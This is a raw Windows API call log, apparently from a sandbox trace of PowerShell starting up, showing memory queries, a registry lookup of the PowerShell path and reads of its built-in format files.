	[0141.482] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.482] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.482] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.482] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.483] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.483] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.598] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.609] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.609] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.610] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.610] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.611] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.612] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.612] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.612] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.613] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.613] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.613] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.614] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.614] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.618] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.622] VirtualQuery (in: lpAddress=0x14bf00, lpBuffer=0x14cdc0, dwLength=0x30 | out: lpBuffer=0x14cdc0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.622] VirtualQuery (in: lpAddress=0x14bf00, lpBuffer=0x14cdc0, dwLength=0x30 | out: lpBuffer=0x14cdc0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.622] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.624] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.754] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.754] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.755] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.761] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0141.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.761] CoTaskMemFree (pv=0x1b7a4040) 
	[0141.763] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.872] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.872] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.873] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.873] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.874] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.874] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.876] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.877] VirtualQuery (in: lpAddress=0x14bef0, lpBuffer=0x14cdb0, dwLength=0x30 | out: lpBuffer=0x14cdb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.878] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x318) returned 0x0
	[0141.879] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x14d3bc, lpData=0x0, lpcbData=0x14d3b8*=0x0 | out: lpType=0x14d3bc*=0x1, lpData=0x0, lpcbData=0x14d3b8*=0x74) returned 0x0
	[0141.879] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x14d32c, lpData=0x0, lpcbData=0x14d328*=0x0 | out: lpType=0x14d32c*=0x1, lpData=0x0, lpcbData=0x14d328*=0x74) returned 0x0
	[0141.879] CoTaskMemAlloc (cb=0x78) returned 0x1d49b0
	[0141.879] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x14d2fc, lpData=0x1d49b0, lpcbData=0x14d2f8*=0x74 | out: lpType=0x14d2fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d2f8*=0x74) returned 0x0
	[0141.879] CoTaskMemFree (pv=0x1d49b0) 
	[0141.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0141.879] SetErrorMode (uMode=0x1) returned 0x1
	[0141.879] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d280 | out: lpFileInformation=0x14d280*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0141.879] SetErrorMode (uMode=0x1) returned 0x1
	[0141.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0141.880] SetErrorMode (uMode=0x1) returned 0x1
	[0141.880] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d280 | out: lpFileInformation=0x14d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0141.880] SetErrorMode (uMode=0x1) returned 0x1
	[0141.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0141.880] SetErrorMode (uMode=0x1) returned 0x1
	[0141.880] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d280 | out: lpFileInformation=0x14d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0141.881] SetErrorMode (uMode=0x1) returned 0x1
	[0141.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0141.881] SetErrorMode (uMode=0x1) returned 0x1
	[0141.881] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d280 | out: lpFileInformation=0x14d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0141.881] SetErrorMode (uMode=0x1) returned 0x1
	[0141.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0141.881] SetErrorMode (uMode=0x1) returned 0x1
	[0141.881] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d280 | out: lpFileInformation=0x14d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0141.882] SetErrorMode (uMode=0x1) returned 0x1
	[0141.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0141.882] SetErrorMode (uMode=0x1) returned 0x1
	[0141.882] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d280 | out: lpFileInformation=0x14d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0141.882] SetErrorMode (uMode=0x1) returned 0x1
	[0141.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0141.883] SetErrorMode (uMode=0x1) returned 0x1
	[0141.883] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d280 | out: lpFileInformation=0x14d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0141.883] SetErrorMode (uMode=0x1) returned 0x1
	[0141.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0141.883] SetErrorMode (uMode=0x1) returned 0x1
	[0141.883] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d280 | out: lpFileInformation=0x14d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0141.883] SetErrorMode (uMode=0x1) returned 0x1
	[0141.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0141.884] SetErrorMode (uMode=0x1) returned 0x1
	[0141.884] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d280 | out: lpFileInformation=0x14d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0141.884] SetErrorMode (uMode=0x1) returned 0x1
	[0141.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0141.884] SetErrorMode (uMode=0x1) returned 0x1
	[0141.884] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d280 | out: lpFileInformation=0x14d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0141.884] SetErrorMode (uMode=0x1) returned 0x1
	[0141.885] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0141.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.885] CoTaskMemFree (pv=0x1b7a4040) 
	[0141.888] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0141.888] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.888] CoTaskMemFree (pv=0x1b7a4040) 
	[0141.888] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0141.888] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.888] CoTaskMemFree (pv=0x1b7a4040) 
	[0141.889] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0141.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.889] CoTaskMemFree (pv=0x1b7a4040) 
	[0141.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0141.889] SetErrorMode (uMode=0x1) returned 0x1
	[0141.889] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0141.890] GetFileType (hFile=0x31c) returned 0x1
	[0141.890] SetErrorMode (uMode=0x1) returned 0x1
	[0141.890] GetFileType (hFile=0x31c) returned 0x1
	[0141.890] ReadFile (in: hFile=0x31c, lpBuffer=0x346c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x346c938*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0141.892] ReadFile (in: hFile=0x31c, lpBuffer=0x346c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x346c938*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0141.892] ReadFile (in: hFile=0x31c, lpBuffer=0x346c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x346c938*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0141.892] ReadFile (in: hFile=0x31c, lpBuffer=0x346c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x346c938*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
